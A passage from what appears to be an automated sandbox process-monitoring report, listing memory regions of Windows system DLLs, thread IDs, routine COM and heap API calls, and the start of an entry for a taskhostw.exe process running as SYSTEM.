"c:\\windows\\system32\\setupapi.dll") Region: id = 3211 start_va = 0x7fffaebd0000 end_va = 0x7fffaec10fff monitored = 0 entry_point = 0x7fffaebd3750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 3212 start_va = 0x3290000 end_va = 0x338ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 3213 start_va = 0x7fffaeb70000 end_va = 0x7fffaebc1fff monitored = 0 entry_point = 0x7fffaeb75770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 3214 start_va = 0x7fffade20000 end_va = 0x7fffadec2fff monitored = 0 entry_point = 0x7fffade22c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 3215 start_va = 0x7fffb11c0000 end_va = 0x7fffb11e6fff monitored = 0 entry_point = 0x7fffb11d0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 3216 start_va = 0x7fffb1180000 end_va = 0x7fffb11b9fff monitored = 0 entry_point = 0x7fffb1188d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 3217 start_va = 0x7fffaddb0000 end_va = 0x7fffaddd4fff monitored = 0 entry_point = 0x7fffaddb5ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 3218 start_va = 0x7fffadd90000 end_va = 0x7fffadda7fff monitored = 0 entry_point = 0x7fffadd94e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 3219 start_va = 0x7fffa8860000 end_va = 0x7fffa8868fff monitored = 0 entry_point = 0x7fffa88621d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 3220 start_va = 0x3390000 end_va = 0x340ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 3221 start_va = 0x7fffaa120000 end_va = 0x7fffaa135fff monitored = 0 entry_point = 0x7fffaa1219f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3222 start_va = 0x7fffaa100000 end_va = 0x7fffaa119fff monitored = 0 entry_point = 0x7fffaa102430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3225 start_va = 0x3410000 end_va = 0x348ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 3226 start_va = 0x3490000 end_va = 0x350ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003490000" filename = "" Region: id = 3227 start_va = 0x7fffb0fd0000 end_va = 0x7fffb0fe6fff monitored = 0 entry_point = 0x7fffb0fd79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3228 start_va = 0x7fffb0c60000 end_va = 0x7fffb0c93fff monitored = 0 entry_point = 0x7fffb0c7ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3229 start_va = 0x7fffb10f0000 end_va = 0x7fffb10fafff monitored = 0 entry_point = 0x7fffb10f19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3230 start_va = 0x3510000 end_va = 0x3696fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 3231 start_va = 0x3510000 end_va = 0x3656fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 3232 start_va = 0x3690000 end_va = 0x3696fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 3233 start_va = 0x3510000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003510000" filename = "" Region: id = 3234 start_va = 0x3650000 end_va = 0x3656fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 3235 start_va = 0x36a0000 end_va = 0x3816fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 3236 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3237 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3238 start_va = 0x7fffadd30000 end_va = 0x7fffadd6ffff monitored = 0 entry_point = 0x7fffadd46c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 3243 start_va = 0x36a0000 end_va = 0x371ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 3244 start_va = 0x3810000 end_va = 0x3816fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003810000" filename = "" Region: id = 3245 start_va = 0x7fffadcb0000 end_va = 0x7fffadd28fff monitored = 0 entry_point = 0x7fffadcb76a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 3246 start_va = 0x150000 end_va = 0x151fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 3247 start_va = 0x7fffadc90000 end_va = 0x7fffadcaefff monitored = 0 entry_point = 0x7fffadc937e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 3248 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Region: id = 3252 start_va = 0x3720000 end_va = 0x379ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003720000" filename = "" Region: id = 3255 start_va = 0x3820000 end_va = 0x389ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 3256 start_va = 0x7fffad5e0000 end_va = 0x7fffad626fff monitored = 0 entry_point = 0x7fffad5e1d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 3257 start_va = 0x7fffad5a0000 end_va = 0x7fffad5dffff monitored = 0 entry_point = 0x7fffad5acbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 3258 start_va = 0x7fffad550000 end_va = 0x7fffad595fff monitored = 0 entry_point = 0x7fffad5579a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 3315 start_va = 0x38a0000 end_va = 0x399ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038a0000" filename = "" Region: id = 3316 start_va = 0x1490000 end_va = 0x14abfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.tlb" filename = "\\Windows\\System32\\activeds.tlb" (normalized: "c:\\windows\\system32\\activeds.tlb") Region: id = 3317 start_va = 0x39a0000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039a0000" filename = "" Region: id = 3318 start_va = 0x3a20000 end_va = 0x3c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 3319 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 3320 start_va = 0x7fffb2360000 end_va = 0x7fffb2376fff monitored = 0 entry_point = 0x7fffb2361390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3321 start_va = 0x7fffafd80000 end_va = 0x7fffafd8bfff monitored = 0 entry_point = 0x7fffafd835c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3323 start_va = 0x3c00000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 3328 start_va = 0x3a20000 end_va = 0x3a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 3335 start_va = 0x7fffad460000 end_va = 0x7fffad4a1fff monitored = 0 entry_point = 0x7fffad463670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 3336 start_va = 0x7fffb23d0000 end_va = 0x7fffb2424fff monitored = 0 entry_point = 0x7fffb23e7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Thread: id = 149 os_tid = 0x35c Thread: id = 150 os_tid = 0x368 Thread: id = 151 os_tid = 0x3ac Thread: id = 152 os_tid = 0x3ec Thread: id = 153 os_tid = 0x60 Thread: id = 154 os_tid = 0x11c Thread: id = 155 os_tid = 0x120 Thread: id = 156 os_tid = 0x13c Thread: id = 157 os_tid = 0x144 Thread: id = 158 os_tid = 0x158 Thread: id = 159 os_tid = 0x150 Thread: id = 160 os_tid = 0x14c Thread: id = 161 os_tid = 0x180 Thread: id = 162 os_tid = 0x184 Thread: id = 163 os_tid = 0x188 Thread: id = 164 os_tid = 0x25c Thread: id = 165 os_tid = 0x260 Thread: id = 166 os_tid = 0x27c Thread: id = 167 os_tid = 0x164 Thread: id = 168 os_tid = 0x3ac Thread: id = 169 os_tid = 0x2e0 Thread: id = 170 os_tid = 0x3c0 Thread: id = 171 os_tid = 0x418 Thread: id = 172 os_tid = 0x490 Thread: id = 173 os_tid = 0x498 [0286.566] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0286.566] CoCreateInstance (in: rclsid=0x7fffafe27f78*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fffafe27f88*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x47f4d0 | out: ppv=0x47f4d0*=0x7fffb4a99610) returned 0x0 [0286.567] CoCreateInstance (in: rclsid=0x7fffafe27f58*(Data1=0x34e, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fffafe27f68*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x47f4c8 | out: ppv=0x47f4c8*=0x2b4d200) returned 0x0 [0286.567] SetEvent (hEvent=0xaf4) returned 1 [0286.637] WaitForSingleObject (hHandle=0xaf0, dwMilliseconds=0xffffffff) Thread: id = 174 os_tid = 0x4b0 Thread: id = 175 os_tid = 0x474 Thread: id = 193 os_tid = 0x58c Thread: id = 200 os_tid = 0x594 Thread: id = 202 os_tid = 0x5ec Thread: id = 203 os_tid = 0x5f0 Thread: id = 209 os_tid = 0x614 Thread: id = 231 os_tid = 0x6d8 Thread: id = 232 os_tid = 0x764 [0286.042] malloc (_Size=0x100) returned 0x83f5e0 [0286.107] PublishDebugMessage () returned 0x1 [0286.108] GetProcessHeap () returned 0x160000 [0286.108] RtlAllocateHeap (HeapHandle=0x160000, Flags=0x0, Size=0x108) returned 0x47f3d0 [0286.108] GetProcessHeap () returned 0x160000 [0286.108] RtlAllocateHeap (HeapHandle=0x160000, Flags=0x0, Size=0x18) returned 0x2b4d780 [0286.108] GetProcessHeap () returned 0x160000 [0286.108] RtlAllocateHeap (HeapHandle=0x160000, Flags=0x0, Size=0x18) returned 0x2b4d1c0 [0286.108] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xae4 [0286.108] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xaec [0286.108] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xaf0 [0286.108] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xaf4 [0286.108] CreateThreadpoolWork (in: pfnwk=0x7fffafe11e90, pv=0x47f3d0, pcbe=0x308f790 | out: pv=0x47f3d0) returned 0x2b3dbe0 [0286.108] TpPostWork () returned 0x3 [0286.108] WaitForSingleObject (hHandle=0xaf4, dwMilliseconds=0xffffffff) returned 0x0 [0286.567] CloseHandle (hObject=0xaf4) returned 1 [0286.567] PublishDebugMessage () returned 0x1 [0286.567] GetProcessHeap () returned 0x160000 [0286.567] RtlAllocateHeap (HeapHandle=0x160000, Flags=0x0, Size=0x58) returned 0x2b1e8d0 [0286.567] GetProcessHeap () returned 0x160000 [0286.567] RtlAllocateHeap (HeapHandle=0x160000, Flags=0x0, Size=0xc) returned 0x2b93990 [0286.568] GetProcessHeap () returned 0x160000 [0286.568] RtlAllocateHeap (HeapHandle=0x160000, Flags=0x0, Size=0xc) returned 0x2b93bd0 [0286.568] PublishDebugMessage () returned 0x1 [0286.568] GetProcessHeap () returned 0x160000 [0286.568] RtlAllocateHeap (HeapHandle=0x160000, Flags=0x0, Size=0x198) returned 0x497070 [0286.568] ??0WMISchema@@QEAA@XZ () returned 0x497070 [0286.568] GetProcessHeap () returned 0x160000 [0286.568] RtlAllocateHeap (HeapHandle=0x160000, Flags=0x0, Size=0x30) returned 0x2b627a0 [0286.568] GetProcessHeap () returned 0x160000 [0286.568] RtlAllocateHeap (HeapHandle=0x160000, Flags=0x0, Size=0x30) returned 0x2b629d0 [0286.568] GetProcessHeap () returned 0x160000 [0286.568] RtlAllocateHeap (HeapHandle=0x160000, Flags=0x0, Size=0x18) returned 0x2b4d680 [0286.568] GetProcessHeap () returned 0x160000 [0286.568] RtlAllocateHeap (HeapHandle=0x160000, Flags=0x0, Size=0x28) returned 0x2b62c00 [0286.568] PublishDebugMessage () returned 0x1 [0286.568] GetCurrentThread () returned 0xfffffffffffffffe [0286.568] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x2e, OpenAsSelf=1, TokenHandle=0x4971e8 | out: TokenHandle=0x4971e8*=0xaf4) returned 1 [0286.568] GetTokenInformation (in: TokenHandle=0xaf4, TokenInformationClass=0x3, TokenInformation=0x308f710, TokenInformationLength=0x10, ReturnLength=0x308f750 | out: TokenInformation=0x308f710, ReturnLength=0x308f750) returned 0 [0286.568] GetLastError () returned 0x7a [0286.568] GetProcessHeap () returned 0x160000 [0286.568] RtlAllocateHeap (HeapHandle=0x160000, Flags=0x0, Size=0x148) returned 0x2b9f160 [0286.568] GetTokenInformation (in: TokenHandle=0xaf4, TokenInformationClass=0x3, TokenInformation=0x2b9f160, TokenInformationLength=0x148, ReturnLength=0x308f750 | out: TokenInformation=0x2b9f160, ReturnLength=0x308f750) returned 1 [0286.569] AdjustTokenPrivileges (in: TokenHandle=0xaf4, DisableAllPrivileges=0, NewState=0x2b9f160*(PrivilegesCount=0x1b, Privileges=((Luid.LowPart=0x3, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x5), (Luid.LowPart=0x2, Luid.HighPart=7, Attributes=0x0), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xa), (Luid.LowPart=0x2, Luid.HighPart=11, Attributes=0x0), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0xe), (Luid.LowPart=0x3, Luid.HighPart=15, Attributes=0x0), (Luid.LowPart=0x10, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x16), (Luid.LowPart=0x2, Luid.HighPart=23, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x23), (Luid.LowPart=0x3, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x40280000), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0286.569] GetProcessHeap () returned 0x160000 [0286.569] RtlFreeHeap (HeapHandle=0x160000, Flags=0x0, BaseAddress=0x2b9f160) returned 1 [0286.569] ClassCache_New () returned 0x0 [0286.569] ResultToHRESULT () returned 0x0 [0286.569] PublishDebugMessage () returned 0x1 [0286.569] GetProcessHeap () returned 0x160000 [0286.569] RtlAllocateHeap (HeapHandle=0x160000, Flags=0x0, Size=0x18) returned 0x2b4d0c0 [0286.569] PublishDebugMessage () returned 0x1 Thread: id = 233 os_tid = 0x788 Thread: id = 249 os_tid = 0x794 Thread: id = 265 os_tid = 0x420 Thread: id = 266 os_tid = 0x450 Thread: id = 268 os_tid = 0x508 Thread: id = 269 os_tid = 0x314 Thread: id = 271 os_tid = 0x458 Thread: id = 272 os_tid = 0x724 Thread: id = 274 os_tid = 0x22c Thread: id = 276 os_tid = 0x308 Thread: id = 277 os_tid = 0x7c0 Thread: id = 285 os_tid = 0x788 Thread: id = 286 os_tid = 0x7e4 Thread: id = 289 os_tid = 0x3e4 Thread: id = 290 os_tid = 0x3f8 Process: id = "10" image_name = "taskhostw.exe" filename = "c:\\windows\\system32\\taskhostw.exe" page_root = "0x34b61000" os_pid = "0x488" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x358" cmd_line = "taskhostw.exe SYSTEM" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ae96" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2430 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2431 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2432 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2433 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2434 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2435 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2436 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2437 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2438 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2439 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2440 start_va = 0x7ff623690000 end_va = 0x7ff6236a8fff monitored = 0 entry_point = 0x7ff6236959b0 region_type = mapped_file name = "taskhostw.exe" filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe") Region: id = 2441 start_va = 0x7fffb5030000 end_va = 0x7fffb51f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2560 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2561 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2562 start_va = 0x5e0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2563 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2564 start_va = 0x7fffb1b20000 end_va = 0x7fffb1d07fff monitored = 0 entry_point = 0x7fffb1b4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2565 start_va = 0x7fffb3fa0000 end_va = 0x7fffb404cfff monitored = 0 entry_point = 0x7fffb3fb81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2566 start_va = 0x7fffb3a90000 end_va = 0x7fffb3b2cfff monitored = 0 entry_point = 0x7fffb3a978a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2567 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2568 start_va = 0x7fffb42d0000 end_va = 0x7fffb43ebfff monitored = 0 entry_point = 0x7fffb43102b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2569 start_va = 0x7fffb4860000 end_va = 0x7fffb4adcfff monitored = 0 entry_point = 0x7fffb4934970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2570 start_va = 0x7fffb1ab0000 end_va = 0x7fffb1b19fff monitored = 0 entry_point = 0x7fffb1ae6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2571 start_va = 0x7fffb2460000 end_va = 0x7fffb2520fff monitored = 0 entry_point = 0x7fffb2480da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2572 start_va = 0x6e0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 2573 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2574 start_va = 0x480000 end_va = 0x5c2fff monitored = 0 entry_point = 0x4a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2647 start_va = 0x480000 end_va = 0x55cfff monitored = 0 entry_point = 0x4de0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2648 start_va = 0x7fffb16d0000 end_va = 0x7fffb16defff monitored = 0 entry_point = 0x7fffb16d3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2649 start_va = 0x7fffb4700000 end_va = 0x7fffb4855fff monitored = 0 entry_point = 0x7fffb470a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2650 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2651 start_va = 0x7fffb3b40000 end_va = 0x7fffb3cc5fff monitored = 0 entry_point = 0x7fffb3b8ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2652 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 2653 start_va = 0x6e0000 end_va = 0x867fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 2654 start_va = 0x8a0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 2655 start_va = 0x8b0000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 2656 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2657 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2658 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskhostw.exe.mui" filename = "\\Windows\\System32\\en-US\\taskhostw.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhostw.exe.mui") Region: id = 2757 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = 